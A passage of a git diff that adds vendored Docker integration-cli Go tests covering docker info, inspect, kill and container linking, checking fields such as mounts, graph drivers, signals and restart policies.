`test.label="1"`, "--label", `test.label="2"`) + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "WARNING: labels with duplicate keys and conflicting values have been deprecated") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go new file mode 100644 index 0000000000..b9323060dd --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go @@ -0,0 +1,15 @@ +// +build !windows + +package main + +import ( + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestInfoSecurityOptions(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, Apparmor, DaemonIsLinux) + + out, _ := dockerCmd(c, "info") + c.Assert(out, checker.Contains, "Security Options:\n apparmor\n seccomp\n Profile: default\n") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go new file mode 100644 index 0000000000..32ed28afe1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go @@ -0,0 +1,466 @@ +package main + +import ( + "encoding/json" + "fmt" + "os" + "os/exec" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func checkValidGraphDriver(c *check.C, name string) { + if name != "devicemapper" && name != "overlay" && name != "vfs" && name != "zfs" && name != "btrfs" && name != "aufs" { + c.Fatalf("%v is not a valid graph driver name", name) + } +} + +func (s *DockerSuite) TestInspectImage(c *check.C) { + testRequires(c, DaemonIsLinux) + imageTest := "emptyfs" + // It is important that this ID remain stable. If a code change causes + // it to be different, this is equivalent to a cache bust when pulling + // a legacy-format manifest. If the check at the end of this function + // fails, fix the difference in the image serialization instead of + // updating this hash. + imageTestID := "sha256:11f64303f0f7ffdc71f001788132bca5346831939a956e3e975c93267d89a16d" + id := inspectField(c, imageTest, "Id") + + c.Assert(id, checker.Equals, imageTestID) +} + +func (s *DockerSuite) TestInspectInt64(c *check.C) { + dockerCmd(c, "run", "-d", "-m=300M", "--name", "inspectTest", "busybox", "true") + inspectOut := inspectField(c, "inspectTest", "HostConfig.Memory") + c.Assert(inspectOut, checker.Equals, "314572800") +} + +func (s *DockerSuite) TestInspectDefault(c *check.C) { + //Both the container and image are named busybox. docker inspect will fetch the container JSON. + //If the container JSON is not available, it will go for the image JSON. + + out, _ := dockerCmd(c, "run", "--name=busybox", "-d", "busybox", "true") + containerID := strings.TrimSpace(out) + + inspectOut := inspectField(c, "busybox", "Id") + c.Assert(strings.TrimSpace(inspectOut), checker.Equals, containerID) +} + +func (s *DockerSuite) TestInspectStatus(c *check.C) { + if daemonPlatform != "windows" { + defer unpauseAllContainers() + } + out, _ := runSleepingContainer(c, "-d") + out = strings.TrimSpace(out) + + inspectOut := inspectField(c, out, "State.Status") + c.Assert(inspectOut, checker.Equals, "running") + + // Windows does not support pause/unpause on Windows Server Containers. + // (RS1 does for Hyper-V Containers, but production CI is not setup for that) + if daemonPlatform != "windows" { + dockerCmd(c, "pause", out) + inspectOut = inspectField(c, out, "State.Status") + c.Assert(inspectOut, checker.Equals, "paused") + + dockerCmd(c, "unpause", out) + inspectOut = inspectField(c, out, "State.Status") + c.Assert(inspectOut, checker.Equals, "running") + } + + dockerCmd(c, "stop", out) + inspectOut = inspectField(c, out, "State.Status") + c.Assert(inspectOut, checker.Equals, "exited") + +} + +func (s *DockerSuite) TestInspectTypeFlagContainer(c *check.C) { + //Both the container and image are named busybox. docker inspect will fetch container + //JSON State.Running field. If the field is true, it's a container. + runSleepingContainer(c, "--name=busybox", "-d") + + formatStr := "--format={{.State.Running}}" + out, _ := dockerCmd(c, "inspect", "--type=container", formatStr, "busybox") + c.Assert(out, checker.Equals, "true\n") // not a container JSON +} + +func (s *DockerSuite) TestInspectTypeFlagWithNoContainer(c *check.C) { + //Run this test on an image named busybox. docker inspect will try to fetch container + //JSON. Since there is no container named busybox and --type=container, docker inspect will + //not try to get the image JSON. It will throw an error. + + dockerCmd(c, "run", "-d", "busybox", "true") + + _, _, err := dockerCmdWithError("inspect", "--type=container", "busybox") + // docker inspect should fail, as there is no container named busybox + c.Assert(err, checker.NotNil) +} + +func (s *DockerSuite) TestInspectTypeFlagWithImage(c *check.C) { + //Both the container and image are named busybox. docker inspect will fetch image + //JSON as --type=image. if there is no image with name busybox, docker inspect + //will throw an error. + + dockerCmd(c, "run", "--name=busybox", "-d", "busybox", "true") + + out, _ := dockerCmd(c, "inspect", "--type=image", "busybox") + c.Assert(out, checker.Not(checker.Contains), "State") // not an image JSON +} + +func (s *DockerSuite) TestInspectTypeFlagWithInvalidValue(c *check.C) { + //Both the container and image are named busybox. docker inspect will fail + //as --type=foobar is not a valid value for the flag. + + dockerCmd(c, "run", "--name=busybox", "-d", "busybox", "true") + + out, exitCode, err := dockerCmdWithError("inspect", "--type=foobar", "busybox") + c.Assert(err, checker.NotNil, check.Commentf("%s", exitCode)) + c.Assert(exitCode, checker.Equals, 1, check.Commentf("%s", err)) + c.Assert(out, checker.Contains, "not a valid value for --type") +} + +func (s *DockerSuite) TestInspectImageFilterInt(c *check.C) { + testRequires(c, DaemonIsLinux) + imageTest := "emptyfs" + out := inspectField(c, imageTest, "Size") + + size, err := strconv.Atoi(out) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect size of the image: %s, %v", out, err)) + + //now see if the size turns out to be the same + formatStr := fmt.Sprintf("--format={{eq .Size %d}}", size) + out, _ = dockerCmd(c, "inspect", formatStr, imageTest) + result, err := strconv.ParseBool(strings.TrimSuffix(out, "\n")) + c.Assert(err, checker.IsNil) + c.Assert(result, checker.Equals, true) +} + +func (s *DockerSuite) TestInspectContainerFilterInt(c *check.C) { + runCmd := exec.Command(dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat") + runCmd.Stdin = strings.NewReader("blahblah") + out, _, _, err := runCommandWithStdoutStderr(runCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to run container: %v, output: %q", err, out)) + + id := strings.TrimSpace(out) + + out = inspectField(c, id, "State.ExitCode") + + exitCode, err := strconv.Atoi(out) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect exitcode of the container: %s, %v", out, err)) + + //now get the exit code to verify + formatStr := fmt.Sprintf("--format={{eq .State.ExitCode %d}}", exitCode) + out, _ = dockerCmd(c, "inspect", formatStr, id) + result, err := strconv.ParseBool(strings.TrimSuffix(out, "\n")) + c.Assert(err, checker.IsNil) + c.Assert(result, checker.Equals, true) +} + +func (s *DockerSuite) TestInspectImageGraphDriver(c *check.C) { + testRequires(c, DaemonIsLinux, Devicemapper) + imageTest := "emptyfs" + name := inspectField(c, imageTest, "GraphDriver.Name") + + checkValidGraphDriver(c, name) + + deviceID := inspectField(c, imageTest, "GraphDriver.Data.DeviceId") + + _, err := strconv.Atoi(deviceID) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceId of the image: %s, %v", deviceID, err)) + + deviceSize := inspectField(c, imageTest, "GraphDriver.Data.DeviceSize") + + _, err = strconv.ParseUint(deviceSize, 10, 64) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceSize of the image: %s, %v", deviceSize, err)) +} + +func (s *DockerSuite) TestInspectContainerGraphDriver(c *check.C) { + testRequires(c, DaemonIsLinux, Devicemapper) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + out = strings.TrimSpace(out) + + name := inspectField(c, out, "GraphDriver.Name") + + checkValidGraphDriver(c, name) + + imageDeviceID := inspectField(c, "busybox", "GraphDriver.Data.DeviceId") + + deviceID := inspectField(c, out, "GraphDriver.Data.DeviceId") + + c.Assert(imageDeviceID, checker.Not(checker.Equals), deviceID) + + _, err := strconv.Atoi(deviceID) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceId of the image: %s, %v", deviceID, err)) + + deviceSize := inspectField(c, out, "GraphDriver.Data.DeviceSize") + + _, err = strconv.ParseUint(deviceSize, 10, 64) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceSize of the image: %s, %v", deviceSize, err)) +} + +func (s *DockerSuite) TestInspectBindMountPoint(c *check.C) { + modifier := ",z" + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + if daemonPlatform == "windows" { + modifier = "" + // TODO Windows: Temporary check - remove once TP5 support is dropped + if windowsDaemonKV < 14350 { + c.Skip("Needs later Windows build for RO volumes") + } + // Linux creates the host directory if it doesn't exist. Windows does not. + os.Mkdir(`c:\data`, os.ModeDir) + } + + dockerCmd(c, "run", "-d", "--name", "test", "-v", prefix+slash+"data:"+prefix+slash+"data:ro"+modifier, "busybox", "cat") + + vol := inspectFieldJSON(c, "test", "Mounts") + + var mp []types.MountPoint + err := json.Unmarshal([]byte(vol), &mp) + c.Assert(err, checker.IsNil) + + // check that there is only one mountpoint + c.Assert(mp, check.HasLen, 1) + + m := mp[0] + + c.Assert(m.Name, checker.Equals, "") + c.Assert(m.Driver, checker.Equals, "") + c.Assert(m.Source, checker.Equals, prefix+slash+"data") + c.Assert(m.Destination, checker.Equals, prefix+slash+"data") + if daemonPlatform != "windows" { // Windows does not set mode + c.Assert(m.Mode, checker.Equals, "ro"+modifier) + } + c.Assert(m.RW, checker.Equals, false) +} + +func (s *DockerSuite) TestInspectNamedMountPoint(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + dockerCmd(c, "run", "-d", "--name", "test", "-v", "data:"+prefix+slash+"data", "busybox", "cat") + + vol := inspectFieldJSON(c, "test", "Mounts") + + var mp []types.MountPoint + err := json.Unmarshal([]byte(vol), &mp) + c.Assert(err, checker.IsNil) + + // check that there is only one mountpoint + c.Assert(mp, checker.HasLen, 1) + + m := mp[0] + + c.Assert(m.Name, checker.Equals, "data") + c.Assert(m.Driver, checker.Equals, "local") + c.Assert(m.Source, checker.Not(checker.Equals), "") + c.Assert(m.Destination, checker.Equals, prefix+slash+"data") + c.Assert(m.RW, checker.Equals, true) +} + +// #14947 +func (s *DockerSuite) TestInspectTimesAsRFC3339Nano(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + id := strings.TrimSpace(out) + startedAt := inspectField(c, id, "State.StartedAt") + finishedAt := inspectField(c, id, "State.FinishedAt") + created := inspectField(c, id, "Created") + + _, err := time.Parse(time.RFC3339Nano, startedAt) + c.Assert(err, checker.IsNil) + _, err = time.Parse(time.RFC3339Nano, finishedAt) + c.Assert(err, checker.IsNil) + _, err = time.Parse(time.RFC3339Nano, created) + c.Assert(err, checker.IsNil) + + created = inspectField(c, "busybox", "Created") + + _, err = time.Parse(time.RFC3339Nano, created) + c.Assert(err, checker.IsNil) +} + +// #15633 +func (s *DockerSuite) TestInspectLogConfigNoType(c *check.C) { + dockerCmd(c, "create", "--name=test", "--log-opt", "max-file=42", "busybox") + var logConfig container.LogConfig + + out := inspectFieldJSON(c, "test", "HostConfig.LogConfig") + + err := json.NewDecoder(strings.NewReader(out)).Decode(&logConfig) + c.Assert(err, checker.IsNil, check.Commentf("%v", out)) + + c.Assert(logConfig.Type, checker.Equals, "json-file") + c.Assert(logConfig.Config["max-file"], checker.Equals, "42", check.Commentf("%v", logConfig)) +} + +func (s *DockerSuite) TestInspectNoSizeFlagContainer(c *check.C) { + + //Both the container and image are named busybox. docker inspect will fetch container + //JSON SizeRw and SizeRootFs field. If there is no flag --size/-s, there are no size fields. + + runSleepingContainer(c, "--name=busybox", "-d") + + formatStr := "--format={{.SizeRw}},{{.SizeRootFs}}" + out, _ := dockerCmd(c, "inspect", "--type=container", formatStr, "busybox") + c.Assert(strings.TrimSpace(out), check.Equals, ",", check.Commentf("Exepcted not to display size info: %s", out)) +} + +func (s *DockerSuite) TestInspectSizeFlagContainer(c *check.C) { + runSleepingContainer(c, "--name=busybox", "-d") + + formatStr := "--format='{{.SizeRw}},{{.SizeRootFs}}'" + out, _ := dockerCmd(c, "inspect", "-s", "--type=container", formatStr, "busybox") + sz := strings.Split(out, ",") + + c.Assert(strings.TrimSpace(sz[0]), check.Not(check.Equals), "") + c.Assert(strings.TrimSpace(sz[1]), check.Not(check.Equals), "") +} + +func (s *DockerSuite) TestInspectTemplateError(c *check.C) { + // Template parsing error for both the container and image. + + runSleepingContainer(c, "--name=container1", "-d") + + out, _, err := dockerCmdWithError("inspect", "--type=container", "--format='Format container: {{.ThisDoesNotExist}}'", "container1") + c.Assert(err, check.Not(check.IsNil)) + c.Assert(out, checker.Contains, "Template parsing error") + + out, _, err = dockerCmdWithError("inspect", "--type=image", "--format='Format container: {{.ThisDoesNotExist}}'", "busybox") + c.Assert(err, check.Not(check.IsNil)) + c.Assert(out, checker.Contains, "Template parsing error") +} + +func (s *DockerSuite) TestInspectJSONFields(c *check.C) { + runSleepingContainer(c, "--name=busybox", "-d") + out, _, err := dockerCmdWithError("inspect", "--type=container", "--format={{.HostConfig.Dns}}", "busybox") + + c.Assert(err, check.IsNil) + c.Assert(out, checker.Equals, "[]\n") +} + +func (s *DockerSuite) TestInspectByPrefix(c *check.C) { + id := inspectField(c, "busybox", "Id") + c.Assert(id, checker.HasPrefix, "sha256:") + + id2 := inspectField(c, id[:12], "Id") + c.Assert(id, checker.Equals, id2) + + id3 := inspectField(c, strings.TrimPrefix(id, "sha256:")[:12], "Id") + c.Assert(id, checker.Equals, id3) +} + +func (s *DockerSuite) TestInspectStopWhenNotFound(c *check.C) { + runSleepingContainer(c, "--name=busybox", "-d") + runSleepingContainer(c, "--name=not-shown", "-d") + out, _, err := dockerCmdWithError("inspect", "--type=container", "--format='{{.Name}}'", "busybox", "missing", "not-shown") + + c.Assert(err, checker.Not(check.IsNil)) + c.Assert(out, checker.Contains, "busybox") + c.Assert(out, checker.Not(checker.Contains), "not-shown") + c.Assert(out, checker.Contains, "Error: No such container: missing") +} + +func (s *DockerSuite) TestInspectHistory(c *check.C) { + dockerCmd(c, "run", "--name=testcont", "busybox", "echo", "hello") + dockerCmd(c, "commit", "-m", "test comment", "testcont", "testimg") + out, _, err := dockerCmdWithError("inspect", "--format='{{.Comment}}'", "testimg") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "test comment") +} + +func (s *DockerSuite) TestInspectContainerNetworkDefault(c *check.C) { + testRequires(c, DaemonIsLinux) + + contName := "test1" + dockerCmd(c, "run", "--name", contName, "-d", "busybox", "top") + netOut, _ := dockerCmd(c, "network", "inspect", "--format={{.ID}}", "bridge") + out := inspectField(c, contName, "NetworkSettings.Networks") + c.Assert(out, checker.Contains, "bridge") + out = inspectField(c, contName, "NetworkSettings.Networks.bridge.NetworkID") + c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(netOut)) +} + +func (s *DockerSuite) TestInspectContainerNetworkCustom(c *check.C) { + testRequires(c, DaemonIsLinux) + + netOut, _ := dockerCmd(c, "network", "create", "net1") + dockerCmd(c, "run", "--name=container1", "--net=net1", "-d", "busybox", "top") + out := inspectField(c, "container1", "NetworkSettings.Networks") + c.Assert(out, checker.Contains, "net1") + out = inspectField(c, "container1", "NetworkSettings.Networks.net1.NetworkID") + c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(netOut)) +} + +func (s *DockerSuite) TestInspectRootFS(c *check.C) { + out, _, err := dockerCmdWithError("inspect", "busybox") + c.Assert(err, check.IsNil) + + var imageJSON []types.ImageInspect + err = json.Unmarshal([]byte(out), &imageJSON) + c.Assert(err, checker.IsNil) + + c.Assert(len(imageJSON[0].RootFS.Layers), checker.GreaterOrEqualThan, 1) +} + +func (s *DockerSuite) TestInspectAmpersand(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "test" + out, _ := dockerCmd(c, "run", "--name", name, "--env", `TEST_ENV="soanni&rtr"`, "busybox", "env") + c.Assert(out, checker.Contains, `soanni&rtr`) + out, _ = dockerCmd(c, "inspect", name) + c.Assert(out, checker.Contains, `soanni&rtr`) +} + +func (s *DockerSuite) TestInspectPlugin(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("inspect", "--type", "plugin", "--format", "{{.Name}}", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag) + + out, _, err = dockerCmdWithError("inspect", "--format", "{{.Name}}", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag) + + // Even without tag the inspect still work + out, _, err = dockerCmdWithError("inspect", "--type", "plugin", "--format", "{{.Name}}", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag) + + out, _, err = dockerCmdWithError("inspect", "--format", "{{.Name}}", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag) + + _, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pNameWithTag) +} + +// Test case for 29185 +func (s *DockerSuite) TestInspectUnknownObject(c *check.C) { + // This test should work on both Windows and Linux + out, _, err := dockerCmdWithError("inspect", "foobar") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Error: No such object: foobar") + c.Assert(err.Error(), checker.Contains, "Error: No such object: foobar") +} + +func (s *DockerSuite) TestInpectInvalidReference(c *check.C) { + // This test should work on both Windows and Linux + out, _, err := dockerCmdWithError("inspect", "FooBar") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Error: No such object: FooBar") + c.Assert(err.Error(), checker.Contains, "Error: No such object: FooBar") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go new file mode 100644 index 0000000000..43164801d4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go @@ -0,0 +1,134 @@ +package main + +import ( + "fmt" + "net/http" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestKillContainer(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + c.Assert(waitRun(cleanedContainerID), check.IsNil) + + dockerCmd(c, "kill", cleanedContainerID) + c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) + + out, _ = dockerCmd(c, "ps", "-q") + c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running")) + +} + +func (s *DockerSuite) TestKillOffStoppedContainer(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "stop", cleanedContainerID) + c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) + + _, _, err := dockerCmdWithError("kill", "-s", "30", cleanedContainerID) + c.Assert(err, check.Not(check.IsNil), check.Commentf("Container %s is not running", cleanedContainerID)) +} + +func (s *DockerSuite) TestKillDifferentUserContainer(c *check.C) { + // TODO Windows: Windows does not yet support -u (Feb 2016). + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-u", "daemon", "-d", "busybox", "top") + cleanedContainerID := strings.TrimSpace(out) + c.Assert(waitRun(cleanedContainerID), check.IsNil) + + dockerCmd(c, "kill", cleanedContainerID) + c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) + + out, _ = dockerCmd(c, "ps", "-q") + c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running")) + +} + +// regression test about correct signal parsing see #13665 +func (s *DockerSuite) TestKillWithSignal(c *check.C) { + // Cannot port to Windows - does not support signals in the same way Linux does + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + cid := strings.TrimSpace(out) + c.Assert(waitRun(cid), check.IsNil) + + dockerCmd(c, "kill", "-s", "SIGWINCH", cid) + time.Sleep(250 * time.Millisecond) + + running := inspectField(c, cid, "State.Running") + + c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after SIGWINCH")) +} + +func (s *DockerSuite) TestKillWithStopSignalWithSameSignalShouldDisableRestartPolicy(c *check.C) { + // Cannot port to Windows - does not support signals int the same way as Linux does + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--stop-signal=TERM", "--restart=always", "busybox", "top") + cid := strings.TrimSpace(out) + c.Assert(waitRun(cid), check.IsNil) + + // Let docker send a TERM signal to the container + // It will kill the process and disable the restart policy + dockerCmd(c, "kill", "-s", "TERM", cid) + c.Assert(waitExited(cid, 10*time.Second), check.IsNil) + + out, _ = dockerCmd(c, "ps", "-q") + c.Assert(out, checker.Not(checker.Contains), cid, check.Commentf("killed container is still running")) +} + +func (s *DockerSuite) TestKillWithStopSignalWithDifferentSignalShouldKeepRestartPolicy(c *check.C) { + // Cannot port to Windows - does not support signals int the same way as Linux does + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--stop-signal=CONT", "--restart=always", "busybox", "top") + cid := strings.TrimSpace(out) + c.Assert(waitRun(cid), check.IsNil) + + // Let docker send a TERM signal to the container + // It will kill the process, but not disable the restart policy + dockerCmd(c, "kill", "-s", "TERM", cid) + c.Assert(waitRestart(cid, 10*time.Second), check.IsNil) + + // Restart policy should still be in place, so it should be still running + c.Assert(waitRun(cid), check.IsNil) +} + +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestKillWithInvalidSignal(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cid := strings.TrimSpace(out) + c.Assert(waitRun(cid), check.IsNil) + + out, _, err := dockerCmdWithError("kill", "-s", "0", cid) + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Invalid signal: 0", check.Commentf("Kill with an invalid signal didn't error out correctly")) + + running := inspectField(c, cid, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after an invalid signal")) + + out, _ = runSleepingContainer(c, "-d") + cid = strings.TrimSpace(out) + c.Assert(waitRun(cid), check.IsNil) + + out, _, err = dockerCmdWithError("kill", "-s", "SIG42", cid) + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Invalid signal: SIG42", check.Commentf("Kill with an invalid signal error out correctly")) + + running = inspectField(c, cid, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after an invalid signal")) + +} + +func (s *DockerSuite) TestKillStoppedContainerAPIPre120(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + runSleepingContainer(c, "--name", "docker-kill-test-api", "-d") + dockerCmd(c, "stop", "docker-kill-test-api") + + status, _, err := sockRequest("POST", fmt.Sprintf("/v1.19/containers/%s/kill", "docker-kill-test-api"), nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusNoContent) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go new file mode 100644 index 0000000000..a5872d9e0c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go @@ -0,0 +1,240 @@ +package main + +import ( + "encoding/json" + "fmt" + "regexp" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/runconfig" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestLinksPingUnlinkedContainers(c *check.C) { + testRequires(c, DaemonIsLinux) + _, exitCode, err := dockerCmdWithError("run", "--rm", "busybox", "sh", "-c", "ping -c 1 alias1 -W 1 && ping -c 1 alias2 -W 1") + + // run ping failed with error + c.Assert(exitCode, checker.Equals, 1, check.Commentf("error: %v", err)) +} + +// Test for appropriate error when calling --link with an invalid target container +func (s *DockerSuite) TestLinksInvalidContainerTarget(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--link", "bogus:alias", "busybox", "true") + + // an invalid container target should produce an error + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // an invalid container target should produce an error + c.Assert(out, checker.Contains, "Could not get container") +} + +func (s *DockerSuite) TestLinksPingLinkedContainers(c *check.C) { + testRequires(c, DaemonIsLinux) + // Test with the three different ways of specifying the default network on Linux + testLinkPingOnNetwork(c, "") + testLinkPingOnNetwork(c, "default") + testLinkPingOnNetwork(c, "bridge") +} + +func testLinkPingOnNetwork(c *check.C, network string) { + var postArgs []string + if network != "" { + postArgs = append(postArgs, []string{"--net", network}...) + } + postArgs = append(postArgs, []string{"busybox", "top"}...) + runArgs1 := append([]string{"run", "-d", "--name", "container1", "--hostname", "fred"}, postArgs...) + runArgs2 := append([]string{"run", "-d", "--name", "container2", "--hostname", "wilma"}, postArgs...) + + // Run the two named containers + dockerCmd(c, runArgs1...) + dockerCmd(c, runArgs2...) + + postArgs = []string{} + if network != "" { + postArgs = append(postArgs, []string{"--net", network}...) + } + postArgs = append(postArgs, []string{"busybox", "sh", "-c"}...) + + // Format a run for a container which links to the other two + runArgs := append([]string{"run", "--rm", "--link", "container1:alias1", "--link", "container2:alias2"}, postArgs...) + pingCmd := "ping -c 1 %s -W 1 && ping -c 1 %s -W 1" + + // test ping by alias, ping by name, and ping by hostname + // 1. Ping by alias + dockerCmd(c, append(runArgs, fmt.Sprintf(pingCmd, "alias1", "alias2"))...) + // 2. Ping by container name + dockerCmd(c, append(runArgs, fmt.Sprintf(pingCmd, "container1", "container2"))...) + // 3. Ping by hostname + dockerCmd(c, append(runArgs, fmt.Sprintf(pingCmd, "fred", "wilma"))...) + + // Clean for next round + dockerCmd(c, "rm", "-f", "container1") + dockerCmd(c, "rm", "-f", "container2") +} + +func (s *DockerSuite) TestLinksPingLinkedContainersAfterRename(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") + idA := strings.TrimSpace(out) + out, _ = dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top") + idB := strings.TrimSpace(out) + dockerCmd(c, "rename", "container1", "container_new") + dockerCmd(c, "run", "--rm", "--link", "container_new:alias1", "--link", "container2:alias2", "busybox", "sh", "-c", "ping -c 1 alias1 -W 1 && ping -c 1 alias2 -W 1") + dockerCmd(c, "kill", idA) + dockerCmd(c, "kill", idB) + +} + +func (s *DockerSuite) TestLinksInspectLinksStarted(c *check.C) { + testRequires(c, DaemonIsLinux) + var ( + expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}} + result []string + ) + dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") + dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top") + dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", "--link", "container2:alias2", "busybox", "top") + links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links") + + err := json.Unmarshal([]byte(links), &result) + c.Assert(err, checker.IsNil) + + output := convertSliceOfStringsToMap(result) + + c.Assert(output, checker.DeepEquals, expected) +} + +func (s *DockerSuite) TestLinksInspectLinksStopped(c *check.C) { + testRequires(c, DaemonIsLinux) + var ( + expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}} + result []string + ) + dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") + dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top") + dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", "--link", "container2:alias2", "busybox", "true") + links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links") + + err := json.Unmarshal([]byte(links), &result) + c.Assert(err, checker.IsNil) + + output := convertSliceOfStringsToMap(result) + + c.Assert(output, checker.DeepEquals, expected) +} + +func (s *DockerSuite) TestLinksNotStartedParentNotFail(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "create", "--name=first", "busybox", "top") + dockerCmd(c, "create", "--name=second", "--link=first:first", "busybox", "top") + dockerCmd(c, "start", "first") + +} + +func (s *DockerSuite) TestLinksHostsFilesInject(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon, ExecSupport) + + out, _ := dockerCmd(c, "run", "-itd", "--name", "one", "busybox", "top") + idOne := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "-itd", "--name", "two", "--link", "one:onetwo", "busybox", "top") + idTwo := strings.TrimSpace(out) + + c.Assert(waitRun(idTwo), checker.IsNil) + + contentOne, err := readContainerFileWithExec(idOne, "/etc/hosts") + c.Assert(err, checker.IsNil, check.Commentf("contentOne: %s", string(contentOne))) + + contentTwo, err := readContainerFileWithExec(idTwo, "/etc/hosts") + c.Assert(err, checker.IsNil, check.Commentf("contentTwo: %s", string(contentTwo))) + // Host is not present in updated hosts file + c.Assert(string(contentTwo), checker.Contains, "onetwo") +} + +func (s *DockerSuite) TestLinksUpdateOnRestart(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon, ExecSupport) + dockerCmd(c, "run", "-d", "--name", "one", "busybox", "top") + out, _ := dockerCmd(c, "run", "-d", "--name", "two", "--link", "one:onetwo", "--link", "one:one", "busybox", "top") + id := strings.TrimSpace(string(out)) + + realIP := inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress") + content, err := readContainerFileWithExec(id, "/etc/hosts") + c.Assert(err, checker.IsNil) + + getIP := 